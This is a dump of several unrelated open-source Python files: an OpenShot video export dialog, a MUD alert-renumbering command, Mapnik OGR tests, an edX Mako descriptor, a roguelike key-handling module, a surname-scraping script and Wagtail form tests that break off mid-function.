profiles = xmldoc.getElementsByTagName("projectprofile")
#get the basic profile
if profiles:
# if profiles are defined, show them
for profile in profiles:
profiles_list.append(_(profile.childNodes[0].data))
else:
# show all profiles
for profile_node in self.profile_list:
profiles_list.append(_(profile_node[0]))
#get the video bit rate(s)
videobitrate = xmldoc.getElementsByTagName("videobitrate")
for rate in videobitrate:
v_l = rate.attributes["low"].value
v_m = rate.attributes["med"].value
v_h = rate.attributes["high"].value
self.vbr = {_("Low"): v_l, _("Med"): v_m, _("High"): v_h}
#get the audio bit rates
audiobitrate = xmldoc.getElementsByTagName("audiobitrate")
for audiorate in audiobitrate:
a_l = audiorate.attributes["low"].value
a_m = audiorate.attributes["med"].value
a_h = audiorate.attributes["high"].value
self.abr = {_("Low"): a_l, _("Med"): a_m, _("High"): a_h}
#get the remaining values
vf = xmldoc.getElementsByTagName("videoformat")
self.videoformat = vf[0].childNodes[0].data
vc = xmldoc.getElementsByTagName("videocodec")
self.videocodec = vc[0].childNodes[0].data
ac = xmldoc.getElementsByTagName("audiocodec")
self.audiocodec = ac[0].childNodes[0].data
sr = xmldoc.getElementsByTagName("samplerate")
self.samplerate = sr[0].childNodes[0].data
c = xmldoc.getElementsByTagName("audiochannels")
self.audiochannels = c[0].childNodes[0].data
# init the profiles combo
for item in sorted(profiles_list):
self.cboSimpleVideoProfile.append_text(item)
# choose the default project type / profile (if it's listed)
#self.set_dropdown_values(self.project.project_type, self.cboSimpleVideoProfile)
#set the quality combo
#only populate with quality settings that exist
if v_l or a_l:
self.cboSimpleQuality.append_text(_("Low"))
if v_m or a_m:
self.cboSimpleQuality.append_text(_("Med"))
if v_h or a_h:
self.cboSimpleQuality.append_text(_("High"))
def on_cboSimpleVideoProfile_changed(self, widget, *args):
# get reference to gettext
_ = self._
#don't do anything if the combo has been cleared
if self.cboSimpleVideoProfile.get_active_text():
profile = str(self.cboSimpleVideoProfile.get_active_text())
#does this profile exist?
p = profiles.mlt_profiles(self.project).get_profile(profile)
if str(p.description()) != profile:
messagebox.show(_("Error!"), _("%s is not a valid OpenShot profile. Profile settings will not be applied." % profile))
self.init_properties(profile)
#set the value of the project type dropdown on the advanced tab
self.set_dropdown_values(profile,self.cmbProjectType)
def on_cboSimpleQuality_changed(self, widget, *args):
# get reference to gettext
_ = self._
#don't do anything if the combo has been cleared
if self.cboSimpleQuality.get_active_text():
# reset the invalid codecs list
self.invalid_codecs = []
# Get the quality
quality = str(self.cboSimpleQuality.get_active_text())
#set the attributes in the advanced tab
#video format
self.set_dropdown_values(self.videoformat, self.cboVIdeoFormat)
#videocodec
self.set_dropdown_values(self.videocodec, self.cboVideoCodec)
			#audio codec
self.set_dropdown_values(self.audiocodec, self.cboAudioCodec)
#samplerate
self.set_dropdown_values(self.samplerate, self.cboSampleRate)
#audiochannels
self.set_dropdown_values(self.audiochannels, self.cboChannels)
#video bit rate
self.cboBitRate.insert_text(0,self.vbr[quality])
self.cboBitRate.set_active(0)
#audio bit rate
self.cboAudioBitRate.insert_text(0,self.abr[quality])
self.cboAudioBitRate.set_active(0)
#check for any invalid codecs and disable
#the export button if required.
if self.invalid_codecs:
missing_codecs = ""
for codec in self.invalid_codecs:
missing_codecs += codec + "\n"
messagebox.show(_("Openshot Error"), _("The following formats/codecs are missing from your system:" + "\n\n" + "%s" % missing_codecs + "\nYou will not be able to use the selected export profile. You will need to install the missing formats/codecs or choose a different export profile."))
self.btnExportVideo.set_sensitive(False)
def set_dropdown_values(self, value_to_set, combobox):
# get reference to gettext
_ = self._
model = combobox.get_model()
iter = model.get_iter_first()
while True:
# get the value of each item in the dropdown
value = model.get_value(iter, 0)
# check for the matching value
if value_to_set == value:
# set the item as active
combobox.set_active_iter(iter)
break
# get the next item in the list
iter = model.iter_next(iter)
			# break loop when no more dropdown items are found
			if iter is None:
				# remember the value as an invalid codec (once only)
				if value_to_set not in self.invalid_codecs:
					self.invalid_codecs.append(value_to_set)
				break
def init_properties(self, profile):
# get correct gettext method
_ = self._
# get the mlt profile
localType = profile
p = profiles.mlt_profiles(self.project).get_profile(localType)
# populate the labels with values
self.lblHeightValue.set_text(str(p.height()))
self.lblWidthValue.set_text(str(p.width()))
self.lblAspectRatioValue.set_text("%s:%s" % (p.display_aspect_num(), p.display_aspect_den()))
self.lblFrameRateValue.set_text("%.2f" % float(p.fps()))
self.lblPixelRatioValue.set_text("%s:%s" % (p.sample_aspect_num(), p.sample_aspect_den()))
if p.progressive():
self.lblProgressiveValue.set_text(_("Yes"))
else:
self.lblProgressiveValue.set_text(_("No"))
def on_frmExportVideo_close(self, widget, *args):
print "on_frmExportVideo_close"
def on_frmExportVideo_destroy(self, widget, *args):
print "on_frmExportVideo_destroy"
self.cancelled = True
# stop the export (if in-progress)
if self.project.form.MyVideo:
self.project.form.MyVideo.c.stop()
		# mark the project as unmodified (and refresh the project XML)
self.project.set_project_modified(is_modified=False, refresh_xml=True)
def on_cboExportTo_changed(self, widget, *args):
print "on_cboExportTo_changed"
# get correct gettext method
_ = self._
# get the "export to" variable
localcboExportTo = self.cboExportTo.get_active_text()
localtxtFileName = str.strip(self.txtFileName.get_text())
localtxtFileName = localtxtFileName.replace("_%d", "")
if localcboExportTo == _("Image Sequence"):
self.expander3.set_expanded(True) # image sequence
self.expander4.set_expanded(False) # video settings
self.expander5.set_expanded(False) # audio settings
# update filename
self.txtFileName.set_text(localtxtFileName + "_%d")
elif localcboExportTo == _("Video & Audio"):
self.expander3.set_expanded(False) # image sequence
self.expander4.set_expanded(True) # video settings
self.expander5.set_expanded(True) # audio settings
# update filename
self.txtFileName.set_text(localtxtFileName)
def on_cboProjectType_changed(self, widget, *args):
print "on_cboProjectType_changed"
# init the project type properties
self.init_properties(self.cmbProjectType.get_active_text())
def on_btnCancel_clicked(self, widget, *args):
print "on_btnCancel_clicked"
self.cancelled=True
self.frmExportVideo.destroy()
def on_btnExportVideo_clicked(self, widget, *args):
print "on_btnExportVideo_clicked"
# get correct gettext method
_ = self._
# Get general settings
localcboExportTo = self.cboExportTo.get_active_text()
localfileExportFolder = str.strip(self.fileExportFolder.get_filename())
localtxtFileName = str.strip(self.txtFileName.get_text())
# get project type
localcmbProjectType = self.cmbProjectType.get_active_text()
# get Image Sequence settings
localtxtImageFormat = str.strip(self.txtImageFormat.get_text())
# get video settings
localtxtVideoFormat = self.cboVIdeoFormat.get_active_text()
localtxtVideoCodec = self.cboVideoCodec.get_active_text()
localtxtBitRate = str.strip(self.txtBitRate.get_text())
BitRateBytes = self.convert_to_bytes(localtxtBitRate)
# get audio settings
localtxtAudioCodec = self.cboAudioCodec.get_active_text()
localtxtSampleRate = str.strip(self.txtSampleRate.get_text())
localtxtChannels = str.strip(self.txtChannels.get_text())
localtxtAudioBitRate = str.strip(self.txtAudioBitRate.get_text())
AudioBitRateBytes = self.convert_to_bytes(localtxtAudioBitRate)
		# Validate the form
if (len(localtxtFileName) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid File Name."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleProjectType.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Project Type."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleTarget.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Target."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleVideoProfile.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Profile."))
elif self.notebook1.get_current_page() == 0 and self.cboSimpleQuality.get_active_iter() == None:
# Show error message
messagebox.show(_("Validation Error!"), _("Please select a valid Quality."))
elif (len(localtxtImageFormat) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Image Format."))
elif (len(localtxtVideoFormat) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Video Format."))
elif (len(localtxtVideoCodec) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Video Codec."))
elif (len(BitRateBytes) == 0 or BitRateBytes == "0"):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Bit Rate."))
elif (len(localtxtAudioCodec) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Codec."))
elif (len(localtxtSampleRate) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Sample Rate."))
elif (len(localtxtChannels) == 0):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Channels."))
elif (len(AudioBitRateBytes) == 0 or AudioBitRateBytes == "0"):
# Show error message
messagebox.show(_("Validation Error!"), _("Please enter a valid Audio Bit Rate."))
else:
# VALID FORM
# update the project's profile
self.project.project_type = localcmbProjectType
# Refresh the MLT XML file
self.project.RefreshXML()
# create dictionary of all options
self.render_options = {}
self.render_options["folder"] = localfileExportFolder
self.render_options["file"] = localtxtFileName
self.render_options["export_to"] = localcboExportTo
if localcboExportTo == _("Image Sequence"):
self.render_options["vcodec"] = localtxtImageFormat
self.render_options["f"] = localtxtImageFormat
elif localcboExportTo == _("Video & Audio"):
self.render_options["vcodec"] = localtxtVideoCodec
self.render_options["f"] = localtxtVideoFormat
self.render_options["b"] = BitRateBytes
self.render_options["acodec"] = localtxtAudioCodec
self.render_options["ar"] = localtxtSampleRate
self.render_options["ac"] = localtxtChannels
self.render_options["ab"] = AudioBitRateBytes
# get the complete path to the new file
folder1 = self.render_options["folder"]
file1 = self.render_options["file"]
self.export_path = "%s.%s" % (os.path.join(folder1, file1), self.render_options["f"])
#check for existing filename before export and confirm overwrite
if os.path.exists(self.export_path):
messagebox.show(_("Confirm Overwrite"), _("There is already a video file named %s.%s in the selected export folder. Would you like to overwrite it?") % (file1, self.render_options["f"]), gtk.BUTTONS_YES_NO, self.confirm_overwrite_yes)
else:
# no existing file, so export now
self.do_export()
def do_export(self):
render_options = self.render_options
# flag that an export is in-progress
self.export_in_progress = True
# set window as MODAL (so they can't mess up the export)
self.frmExportVideo.set_modal(True)
# re-load the xml
self.project.form.MyVideo.set_profile(self.project.project_type, load_xml=False)
self.project.form.MyVideo.set_project(self.project, self.project.form, os.path.join(self.project.USER_DIR, "sequence.mlt"), mode="render", render_options=render_options)
self.project.form.MyVideo.load_xml()
def confirm_overwrite_yes(self):
#user agrees to overwrite the file
self.do_export()
def update_progress(self, new_percentage):
# get correct gettext method
_ = self._
# update the percentage complete
self.progressExportVideo.set_fraction(new_percentage)
# if progress bar is 100%, close window
if new_percentage == 1 and self.export_in_progress:
			# remove the MODAL property from the window (since we are done)
self.frmExportVideo.set_modal(False)
if not self.cancelled:
title = _("Export Complete")
message = _("The video has been successfully exported to\n%s") % self.export_path
# prompt user that export is completed
if has_py_notify:
# Use libnotify to show the message (if possible)
if pynotify.init("OpenShot Video Editor"):
n = pynotify.Notification(title, message)
n.show()
else:
# use a GTK messagebox
messagebox.show(title, message)
# flag export as completed
self.export_in_progress = False
# close the window
#self.frmExportVideo.destroy()
	def convert_to_bytes(self, BitRateString):
		bit_rate_bytes = 0
		# split the string into pieces, e.g. "5 mb/s" becomes ["5", "mb/s"]
		s = BitRateString.lower().split(" ")
		try:
			# get the bit rate
			if len(s) >= 2:
				raw_number_string = s[0]
				raw_measurement = s[1]
				# convert string number to float (based on locale settings)
				raw_number = locale.atof(raw_number_string)
				if "kb" in raw_measurement:
					bit_rate_bytes = raw_number * 1000.0
				elif "mb" in raw_measurement:
					bit_rate_bytes = raw_number * 1000.0 * 1000.0
		except Exception:
			pass
		# return the bit rate as a whole-number string
		return str(int(bit_rate_bytes))
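	# Example (illustrative): convert_to_bytes("5 mb/s") returns "5000000",
	# and convert_to_bytes("128 kb/s") returns "128000".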
def on_cboVIdeoFormat_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def on_cboVideoCodec_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def on_cboAudioCodec_changed(self, widget, *args):
self.btnExportVideo.set_sensitive(True)
def main():
frmExportVideo1 = frmExportVideo()
frmExportVideo1.run()
if __name__ == "__main__":
main()
| gpl-3.0 | 3,901,255,048,601,620,000 | 30.961373 | 292 | 0.695806 | false |
vlegoff/tsunami | src/primaires/scripting/commandes/scripting/alerte_rebase.py | 1 | 2791 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module contenant la commande 'scripting alerte rebase'."""
from primaires.interpreteur.masque.parametre import Parametre
class PrmRebase(Parametre):
"""Commande 'scripting alerte rebase'"""
def __init__(self):
"""Constructeur du paramètre."""
Parametre.__init__(self, "rebase", "rebase")
self.nom_groupe = "administrateur"
self.aide_courte = "re-numérote les alertes"
self.aide_longue = \
"Cette commande permet de réordonner les alertes en les " \
"numérotant proprement de 1 à N. Ceci est souvent un " \
"plus si le nombre d'alertes commence à devenir important " \
"et leur ID est trop élevé."
def interpreter(self, personnage, dic_masques):
"""Méthode d'interprétation de commande"""
alertes = sorted(list(importeur.scripting.alertes.values()),
key=lambda a: a.no)
for i, alerte in enumerate(alertes):
del importeur.scripting.alertes[alerte.no]
alerte.no = i + 1
importeur.scripting.alertes[i + 1] = alerte
type(alerte).no_actuel = len(alertes)
personnage << "{} alertes renumérotées.".format(len(alertes))
| bsd-3-clause | -8,156,610,740,187,534,000 | 45.316667 | 79 | 0.712487 | false |
ake-koomsin/mapnik_nvpr | tests/python_tests/ogr_test.py | 1 | 2621 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import *
from utilities import execution_path
import os, mapnik
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
if 'ogr' in mapnik.DatasourceCache.plugin_names():
# Shapefile initialization
def test_shapefile_init():
s = mapnik.Ogr(file='../../demo/data/boundaries.shp',layer_by_index=0)
e = s.envelope()
assert_almost_equal(e.minx, -11121.6896651, places=7)
assert_almost_equal(e.miny, -724724.216526, places=6)
assert_almost_equal(e.maxx, 2463000.67866, places=5)
assert_almost_equal(e.maxy, 1649661.267, places=3)
# Shapefile properties
def test_shapefile_properties():
# NOTE: encoding is latin1 but gdal >= 1.9 should now expose utf8 encoded features
# See SHAPE_ENCODING for overriding: http://gdal.org/ogr/drv_shapefile.html
# So: failure for the NOM_FR field is expected for older gdal
ds = mapnik.Ogr(file='../../demo/data/boundaries.shp',layer_by_index=0)
f = ds.features_at_point(ds.envelope().center()).features[0]
eq_(ds.geometry_type(),mapnik.DataGeometryType.Polygon)
eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
eq_(f['COUNTRY'], u'CAN')
eq_(f['F_CODE'], u'FA001')
eq_(f['NAME_EN'], u'Quebec')
# this seems to break if icu data linking is not working
eq_(f['NOM_FR'], u'Qu\xe9bec')
eq_(f['NOM_FR'], u'Québec')
eq_(f['Shape_Area'], 1512185733150.0)
eq_(f['Shape_Leng'], 19218883.724300001)
@raises(RuntimeError)
def test_that_nonexistant_query_field_throws(**kwargs):
ds = mapnik.Ogr(file='../data/shp/world_merc.shp',layer_by_index=0)
eq_(len(ds.fields()),11)
eq_(ds.fields(),['FIPS', 'ISO2', 'ISO3', 'UN', 'NAME', 'AREA', 'POP2005', 'REGION', 'SUBREGION', 'LON', 'LAT'])
eq_(ds.field_types(),['str', 'str', 'str', 'int', 'str', 'int', 'int', 'int', 'int', 'float', 'float'])
query = mapnik.Query(ds.envelope())
for fld in ds.fields():
query.add_property_name(fld)
# also add an invalid one, triggering throw
query.add_property_name('bogus')
fs = ds.features(query)
def test_handling_of_null_features():
ds = mapnik.Ogr(file='../data/json/null_feature.json',layer_by_index=0)
fs = ds.all_features()
eq_(len(fs),1)
if __name__ == "__main__":
setup()
[eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | -137,470,692,475,225,730 | 38.69697 | 119 | 0.606107 | false |
wwj718/ANALYSE | common/lib/xmodule/xmodule/mako_module.py | 6 | 1459 | from .x_module import XModuleDescriptor, DescriptorSystem
class MakoDescriptorSystem(DescriptorSystem):
def __init__(self, render_template, **kwargs):
super(MakoDescriptorSystem, self).__init__(**kwargs)
self.render_template = render_template
class MakoModuleDescriptor(XModuleDescriptor):
"""
Module descriptor intended as a mixin that uses a mako template
to specify the module html.
Expects the descriptor to have the `mako_template` attribute set
with the name of the template to render, and it will pass
    the descriptor as the `module` parameter to that template.
MakoModuleDescriptor.__init__ takes the same arguments as xmodule.x_module:XModuleDescriptor.__init__
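    Example (a hypothetical subclass; the template path is illustrative):
        class SampleDescriptor(MakoModuleDescriptor):
            mako_template = 'widgets/sample-edit.html'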
"""
def __init__(self, *args, **kwargs):
super(MakoModuleDescriptor, self).__init__(*args, **kwargs)
if getattr(self.runtime, 'render_template', None) is None:
raise TypeError('{runtime} must have a render_template function'
' in order to use a MakoDescriptor'.format(
runtime=self.runtime))
def get_context(self):
"""
Return the context to render the mako template with
"""
return {
'module': self,
'editable_metadata_fields': self.editable_metadata_fields
}
def get_html(self):
return self.system.render_template(
self.mako_template, self.get_context())
| agpl-3.0 | -8,738,385,567,089,706,000 | 34.585366 | 105 | 0.648389 | false |
nerdyLawman/pyhack | src/interface/controls.py | 1 | 4117 | import libtcodpy as libtcod
import gameconfig
def target_tile(max_range=None):
global key, mouse
# returns x, y of a tile selected by a mouseclick
while True:
libtcod.console_flush()
libtcod.sys_check_for_event(libtcod.EVENT_KEY_PRESS|libtcod.EVENT_MOUSE, key, mouse)
render_all()
(x, y) = (mouse.cx, mouse.cy)
if (mouse.lbutton_pressed and libtcod.map_is_in_fov(fov_map, x, y) and
(max_range is None or player.distance(x, y) <= max_range)):
return(x, y)
if mouse.rbutton_pressed or key.vk == libtcod.KEY_ESCAPE:
return(None, None)
def target_npc(max_range=None):
# select NPC in range
while True:
(x, y) = target_tile(max_range)
if x is None:
return None
for obj in objects:
if obj.x == x and obj.y == y and obj.fighter and obj != player:
return obj
def get_names_under_mouse():
# return name of object under mouse pointer
global mouse
(x, y) = (mouse.cx, mouse.cy)
names = [obj.name for obj in objects
if obj.x == x and obj.y == y and libtcod.map_is_in_fov(fov_map, obj.x, obj.y)]
names = ', '.join(names)
return names.capitalize()
def handle_keys():
global playerx, playery, fov_recompute, key
# primary game controls
if key.vk == libtcod.KEY_ENTER and key.lalt:
#Alt+Enter: toggle fullscreen
libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
elif key.vk == libtcod.KEY_ESCAPE:
selected = 0
return('exit')
    # 8-directional movement: arrow keys or numpad
if key.vk == libtcod.KEY_UP or key.vk == libtcod.KEY_KP8:
player_move_or_attack(0, -1)
elif key.vk == libtcod.KEY_DOWN or key.vk == libtcod.KEY_KP2:
player_move_or_attack(0, 1)
elif key.vk == libtcod.KEY_LEFT or key.vk == libtcod.KEY_KP4:
player_move_or_attack(-1, 0)
elif key.vk == libtcod.KEY_RIGHT or key.vk == libtcod.KEY_KP6:
player_move_or_attack(1, 0)
elif key.vk == libtcod.KEY_KP7:
player_move_or_attack(-1, -1)
elif key.vk == libtcod.KEY_KP9:
player_move_or_attack(1, -1)
elif key.vk == libtcod.KEY_KP1:
player_move_or_attack(-1, 1)
elif key.vk == libtcod.KEY_KP3:
player_move_or_attack(1, 1)
elif key.vk == libtcod.KEY_KP5:
message('You wait a turn for the darkness to close in on you.', libtcod.white)
pass
else:
# additional game commands
key_char = chr(key.c)
# pick up an item
if key_char == 'g':
for obj in objects:
if obj.x == player.x and obj.y == player.y and obj.item:
obj.item.pick_up()
break
# go down stairs if player is on them
if key_char == ',' or key_char == '.':
if stairs.x == player.x and stairs.y == player.y:
next_level()
# display inventory
if key_char == 'i':
selection = -1
chosen_item = inventory_menu('Press the key next to an item to use it, or ESC to cancel\n')
if chosen_item is not None:
chosen_item.use()
# drop item
if key_char == 'd':
chosen_item = inventory_menu('Press the key next to an item to drop it.\n')
if chosen_item is not None:
chosen_item.drop()
# show character info
if key_char == 'c':
level_up_xp = LEVEL_UP_BASE + player.level * LEVEL_UP_FACTOR
message_box('Character Information\n\nLevel: ' + str(player.level) + '\nExperience: ' + str(player.fighter.xp) +
'\nExperience to level up: ' + str(level_up_xp) + '\n\nMaximum HP: ' + str(player.fighter.max_hp) +
'\nAttack: ' + str(player.fighter.power) + '\nDefense: ' + str(player.fighter.defense), 24)
# toggle fullscreen
if key_char == 'f':
libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
return('no turn') # nothing valid happened
return('playing') # carry on
| gpl-3.0 | -7,436,060,564,142,350,000 | 37.476636 | 124 | 0.575419 | false |
subeax/grab | grab/tools/account/files/parse_ru_lname.py | 1 | 1893 | try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
import re
urls = """
http://genofond.binec.ru/default2.aspx?p=98
http://genofond.binec.ru/default2.aspx?s=0&p=69
http://genofond.binec.ru/default2.aspx?s=0&p=70
http://genofond.binec.ru/default2.aspx?s=0&p=71
http://genofond.binec.ru/default2.aspx?s=0&p=72
http://genofond.binec.ru/default2.aspx?s=0&p=73
http://genofond.binec.ru/default2.aspx?s=0&p=74
http://genofond.binec.ru/default2.aspx?s=0&p=75
http://genofond.binec.ru/default2.aspx?s=0&p=76
http://genofond.binec.ru/default2.aspx?s=0&p=77
http://genofond.binec.ru/default2.aspx?s=0&p=78
http://genofond.binec.ru/default2.aspx?s=0&p=79
http://genofond.binec.ru/default2.aspx?s=0&p=80
http://genofond.binec.ru/default2.aspx?s=0&p=81
http://genofond.binec.ru/default2.aspx?s=0&p=82
http://genofond.binec.ru/default2.aspx?s=0&p=83
http://genofond.binec.ru/default2.aspx?s=0&p=84
http://genofond.binec.ru/default2.aspx?s=0&p=85
http://genofond.binec.ru/default2.aspx?s=0&p=88
http://genofond.binec.ru/default2.aspx?s=0&p=89
http://genofond.binec.ru/default2.aspx?s=0&p=90
http://genofond.binec.ru/default2.aspx?s=0&p=91
http://genofond.binec.ru/default2.aspx?s=0&p=92
http://genofond.binec.ru/default2.aspx?s=0&p=93
http://genofond.binec.ru/default2.aspx?s=0&p=94
http://genofond.binec.ru/default2.aspx?s=0&p=95
http://genofond.binec.ru/default2.aspx?s=0&p=96
http://genofond.binec.ru/default2.aspx?s=0&p=97
"""
urls = [x.strip() for x in urls.strip().splitlines()]
re_lname = re.compile(r'<FONT face=Calibri color=#000000 size=3>([^\d][^<]+)</FONT>')
outfile = open('ru_lname.txt', 'w')
for url in urls:
print(url)
data = urlopen(url).read().decode('cp1251')
items = []
for lname in re_lname.findall(data):
lname = lname.lower().capitalize()
outfile.write(lname.encode('utf-8') + '\n')
print(lname)
| mit | -4,212,795,307,099,121,700 | 36.117647 | 85 | 0.711569 | false |
tangentlabs/wagtail | wagtail/wagtailforms/tests.py | 14 | 17365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.test import TestCase
from django.core import mail
from django import forms
from django.core.urlresolvers import reverse
from wagtail.wagtailcore.models import Page
from wagtail.wagtailforms.models import FormSubmission
from wagtail.wagtailforms.forms import FormBuilder
from wagtail.tests.testapp.models import FormPage, FormField
from wagtail.tests.utils import WagtailTestUtils
def make_form_page(**kwargs):
kwargs.setdefault('title', "Contact us")
kwargs.setdefault('slug', "contact-us")
kwargs.setdefault('to_address', "[email protected]")
kwargs.setdefault('from_address', "[email protected]")
kwargs.setdefault('subject', "The subject")
home_page = Page.objects.get(url_path='/home/')
form_page = home_page.add_child(instance=FormPage(**kwargs))
FormField.objects.create(
page=form_page,
sort_order=1,
label="Your email",
field_type='email',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=2,
label="Your message",
field_type='multiline',
required=True,
)
FormField.objects.create(
page=form_page,
sort_order=3,
label="Your choices",
field_type='checkboxes',
required=False,
choices='foo,bar,baz',
)
return form_page
class TestFormSubmission(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
def test_get_form(self):
response = self.client.get('/contact-us/')
# Check response
self.assertContains(response, """<label for="id_your-email">Your email</label>""")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
def test_post_invalid_form(self):
response = self.client.post('/contact-us/', {
'your-email': 'bob',
'your-message': 'hello world',
'your-choices': ''
})
# Check response
self.assertContains(response, "Enter a valid email address.")
self.assertTemplateUsed(response, 'tests/form_page.html')
self.assertTemplateNotUsed(response, 'tests/form_page_landing.html')
def test_post_valid_form(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# check that variables defined in get_context are passed through to the template (#1429)
self.assertContains(response, "<p>hello world</p>")
# Check that an email was sent
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, "The subject")
self.assertIn("Your message: hello world", mail.outbox[0].body)
self.assertEqual(mail.outbox[0].to, ['[email protected]'])
self.assertEqual(mail.outbox[0].from_email, '[email protected]')
# Check that form submission was saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
self.assertTrue(FormSubmission.objects.filter(page=form_page, form_data__contains='hello world').exists())
def test_post_unicode_characters(self):
self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'こんにちは、世界',
'your-choices': {'foo': '', 'bar': '', 'baz': ''}
})
# Check the email
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your message: こんにちは、世界", mail.outbox[0].body)
# Check the form submission
submission = FormSubmission.objects.get()
submission_data = json.loads(submission.form_data)
self.assertEqual(submission_data['your-message'], 'こんにちは、世界')
def test_post_multiple_values(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': 'on', 'bar': 'on', 'baz': 'on'}
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the three checkbox values were saved correctly
form_page = Page.objects.get(url_path='/home/contact-us/')
submission = FormSubmission.objects.filter(
page=form_page, form_data__contains='hello world'
)
self.assertIn("foo", submission[0].form_data)
self.assertIn("bar", submission[0].form_data)
self.assertIn("baz", submission[0].form_data)
def test_post_blank_checkbox(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {},
})
# Check response
self.assertContains(response, "Thank you for your feedback.")
self.assertTemplateNotUsed(response, 'tests/form_page.html')
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that the checkbox was serialised in the email correctly
self.assertEqual(len(mail.outbox), 1)
self.assertIn("Your choices: None", mail.outbox[0].body)
class TestFormBuilder(TestCase):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Create a form builder
self.fb = FormBuilder(self.form_page.form_fields.all())
def test_fields(self):
"""
This tests that all fields were added to the form with the correct types
"""
form_class = self.fb.get_form_class()
self.assertIn('your-email', form_class.base_fields.keys())
self.assertIn('your-message', form_class.base_fields.keys())
self.assertIsInstance(form_class.base_fields['your-email'], forms.EmailField)
self.assertIsInstance(form_class.base_fields['your-message'], forms.CharField)
class TestFormsIndex(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/')
def make_form_pages(self):
"""
This makes 100 form pages and adds them as children to 'contact-us'
This is used to test pagination on the forms index
"""
for i in range(100):
self.form_page.add_child(instance=FormPage(
title="Form " + str(i),
slug='form-' + str(i),
live=True
))
def test_forms_index(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
def test_forms_index_pagination(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that we got the correct page
self.assertEqual(response.context['form_pages'].number, 2)
def test_forms_index_pagination_invalid(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
